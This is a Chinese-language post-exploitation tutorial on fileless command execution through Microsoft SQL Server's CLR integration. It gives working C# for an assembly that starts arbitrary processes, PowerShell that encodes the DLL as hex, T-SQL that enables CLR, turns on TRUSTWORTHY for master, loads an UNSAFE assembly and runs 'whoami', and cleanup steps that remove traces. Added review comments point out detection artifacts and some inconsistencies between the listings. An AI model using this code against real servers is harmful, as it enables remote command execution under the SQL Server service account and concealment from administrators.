MSSQL[CLR]不落地执行

一、mssql clr介绍:

在 MSSQL 2005 及之后的版本中内置了对 CLR 的支持(该功能默认处于关闭状态,需要通过 sp_configure 开启,见下文),可以加载并运行 .NET 框架的程序集

二、利用过程

首先创建一个 dll,该 dll 的功能是命令执行


using System; using System.Data; using System.Diagnostics; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Threading; using System.Runtime.InteropServices;

namespace Hi.Test
{
    // Assembly loaded into SQL Server through CREATE ASSEMBLY (see the T-SQL below).
    // Everything in here executes inside the SQL Server process, so child processes
    // inherit the identity of the SQL Server service account. Loading it needs
    // 'clr enabled' = 1 and PERMISSION_SET = UNSAFE, both of which are server-wide
    // changes and good audit / detection points.
    public class SQLClr
    {
        /// <summary>
        /// Starts <paramref name="proc"/> with <paramref name="arg"/>, waits for it to
        /// exit and returns its standard output followed by its standard error.
        /// Mapped to a T-SQL scalar function further down the page.
        /// </summary>
        /// <param name="proc">Executable to start (Process.StartInfo.FileName).</param>
        /// <param name="arg">Command line passed to the executable.</param>
        /// <returns>Captured stdout + stderr, or the exception text if anything threw.</returns>
        public static string Run( string proc, string arg )
        {
            try
            {
                Process p = new Process();
                p.StartInfo.FileName = proc;
                p.StartInfo.Arguments = arg;
                p.StartInfo.UseShellExecute = false;          // needed to redirect the streams
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.Start();                                    // child of sqlservr.exe
                p.WaitForExit();
                return(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd() );
            }
            catch ( Exception ex )
            {
                // Failures are returned to the caller as text rather than raised;
                // nothing is logged on the server side.
                return(ex.ToString() );
            }
        }

        /// <summary>
        /// Stored-procedure entry point: runs <see cref="Run"/> and sends the result
        /// back to the client as a one-row, one-column result set. The column is
        /// declared as NVARCHAR(4000), so that is the size of the returned value.
        /// </summary>
        /// <param name="proc">Executable to start; forwarded to <see cref="Run"/>.</param>
        /// <param name="arg">Command line; forwarded to <see cref="Run"/>.</param>
        public static void RunProc( string proc, string arg )
        {
            SqlDataRecord record = new SqlDataRecord( new SqlMetaData( "ret", SqlDbType.NVarChar, 4000 ) );
            SqlContext.Pipe.SendResultsStart( record );
            record.SetString( 0, Run( proc, arg ) );
            SqlContext.Pipe.SendResultsRow( record );
            SqlContext.Pipe.SendResultsEnd();
        }

        /// <summary>
        /// Reports "x64" when IntPtr is 8 bytes wide, otherwise "x86". Because CLR code
        /// runs in-process, this reflects the bitness of the hosting SQL Server process.
        /// </summary>
        /// <returns>"x64" or "x86".</returns>
        public static string ProcessArch()
        {
            return(Marshal.SizeOf( typeof(IntPtr) ) == 8 ? "x64" : "x86");
        }

        // P/Invoke declaration that nothing in this listing calls. Native interop such as
        // this is one of the capabilities that PERMISSION_SET = UNSAFE grants and is a
        // reason reviewers inspect UNSAFE assemblies for kernel32 imports.
        [DllImport( "kernel32.dll" )] static extern IntPtr VirtualAlloc( IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect );
    }
}

 

 

本地编译后生成dll文件:C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /target:library c:\1.cs

 

 

因为要不落地执行,所以要用 powershell 把生成出来的 dll 文件转成 hex

 

 

# Reads the compiled assembly byte by byte and writes it out as a hex literal (0x...)
# so the CREATE ASSEMBLY statement carries the binary inline instead of a file path.
$assemblyFile = "C:\Users\hello\Desktop\1.dll"
$stringBuilder = New-Object -Type System.Text.StringBuilder
$stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM `n0x") | Out-Null
$fileStream = [IO.File]::OpenRead($assemblyFile)
# ReadByte returns -1 at end of file; each byte becomes two upper-case hex digits.
while (($byte = $fileStream.ReadByte()) -gt -1) {     
    $stringBuilder.Append($byte.ToString("X2")) | Out-Null
    }
# NOTE(review): $fileStream is never closed or disposed after the loop.
# PERMISSION_SET = UNSAFE is what later allows Process.Start and P/Invoke from the assembly.
$stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null
# NOTE(review): this refers to [StoredProcedures].[clr_exec], which does not exist in the
# C# listing above (its class is Hi.Test.SQLClr with RunProc/Run). The T-SQL section
# further down uses the matching names; presumably only the hex literal is reused from this file.
$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[clr_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[clr_exec];") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 
$stringBuilder.AppendLine("EXEC[dbo].[clr_exec] 'whoami'") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 
# Whole script is written to one text file for later use.
$stringBuilder.ToString() -join "" | Out-File d:\2221.txt 

利用上面的那段 hex 创建存储过程,执行系统命令,单句执行。

use msdb;

-- NOTE(review): the objects below are created in msdb (the current database), yet
-- TRUSTWORTHY is switched on for master. The cleanup section further down does not
-- revert this property, so the change outlives the session; defenders can check
-- sys.databases.is_trustworthy_on for databases that should not have it set.
alter database master set trustworthy on;

-- 'clr enabled' is an advanced option, hence 'show advanced options' first. Both are
-- instance-wide configuration changes and are normally written to the SQL Server
-- error log, which makes them useful detection points.
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1;reconfigure;

-- 0x..... stands for the hex literal produced by the PowerShell script above;
-- permission_set=unsafe is required for the assembly's Process.Start and P/Invoke.
create assembly sysinfo from 0x.....   with permission_set=unsafe;

-- Binds Hi.Test.SQLClr.RunProc as a stored procedure (result set output).
create procedure sysinfo_run_proc(@proc nvarchar(max),@arg nvarchar(max)) as external name sysinfo.[Hi.Test.SQLClr].RunProc;

-- Binds Hi.Test.SQLClr.Run as a scalar function (return value output).
create function sysinfo_run(@proc nvarchar(max),@arg nvarchar(max)) returns nvarchar(max) as external name sysinfo.[Hi.Test.SQLClr].Run;

-- The child process is spawned by the SQL Server process itself, so it runs as the
-- service account; a process tree rooted at sqlservr.exe is the observable artifact.
select msdb.dbo.sysinfo_run('whoami','/user')

 

利用完毕之后删除创建的存储过程,恢复clr为原始状态

-- Objects that reference the assembly have to be dropped before the assembly itself.
drop function sysinfo_run;

drop procedure sysinfo_run_proc;

drop assembly sysinfo;

-- NOTE(review): these hard-code 0 instead of restoring the values that were in effect
-- before; if CLR was already enabled on the instance this turns it off. The TRUSTWORTHY
-- change on master made earlier is not undone here.
exec sp_configure 'clr enabled',0;

RECONFIGURE WITH OVERRIDE;

exec sp_configure 'show advanced options',0;

RECONFIGURE WITH OVERRIDE;

 

 
